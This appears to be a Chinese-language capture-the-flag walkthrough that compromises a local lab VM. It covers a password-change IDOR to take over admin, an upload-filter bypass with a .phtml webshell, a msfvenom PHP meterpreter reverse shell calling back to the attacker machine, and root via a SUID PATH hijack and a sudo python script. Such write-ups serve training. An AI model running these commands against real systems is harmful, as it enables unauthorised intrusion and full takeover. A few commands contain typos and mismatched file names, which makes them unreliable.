1 信息收集

1.1 主机发现

arp-scan -l 

主机IP地址为：192.168.1.17

1.2 端口和服务扫描

nmap -sS -sV -A -T5 -p- 192.168.1.17 

开放22，80端口

1.3 目录扫描

dirsearch -u 192.168.1.17

2 渗透

2.1 访问端口

2.2 注册账号

暴力破解不现实，可以尝试注册一个个账号

分别输出入用户名，邮箱，密码

2.3 登录网站

2.4 抓包

测试修改密码并将id修改为1

这里现在密码已经更新 已经修改好了从新登入：admin/123 发现登入成功！！！！ 看到一个上传点 🆗又可以继续利用了

2.5 文件上传

这里过滤了很多试了好几个都不行（连接不上）可以使用phar或者phtml进行绕过

新建一个文档输入： ` 把后缀改为png、jpg、gif然后抓包 修改为phtml`然后放包 有个蓝色的file点击即可

上传结果

2.6 中国蚁剑链接

2.7 反弹shell

1 生成php反弹shell脚本：

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.52 lpor=4444 -o shell.php

2 启动pythonweb服务

python3 -m http.server 80

在靶机的upload文件夹下载：

wget http://192.168.1.17/shell.php

3 kali启动msf监听

开启msf，使用模块，设置参数和载荷：

use exploit/multi/handler
set lhost 192.168.1.52
set lport 4444
set payload php/meterpreter/reverse_tcp

开启监听并访问shell文件触发监听：

run
http://192.168.1.17//upload/msfshell.php

进入shell，并生成一个交互式shell：

shell
python3 -c 'import pty;pty.spawn("/bin/bash")'

3 提权

3.1 敏感文件

查看敏感文件之后发现有两个用户：

cat /etc/passwd | grep /bin/bash

3.2 提权

经过一番搜索，在john的家目录发现一个叫toto的文件，具有SUID权限，其作用是输出id：

既然如此，我们能不能修改一下环境变量，让他执行id命令的时候打开一个john的bash：

echo "/bin/bash" > /tmp/id
chmod 777 /tmp/id
export PATH=/tmp:$PATH
./toto

拿到john的权限之后，查看john的家目录，找到了密码：

查看john的权限： 这里需要输入密码

sudo -l

发现john可以以root的身份执行file这个python文件：

在file.py里面写一段打开shell的代码，再以root的身份执行：

echo "import pty;pty.spawn('/bin/bash')" > file.py
sudo python3 /home/john/file.py

成功拿到root权限！！！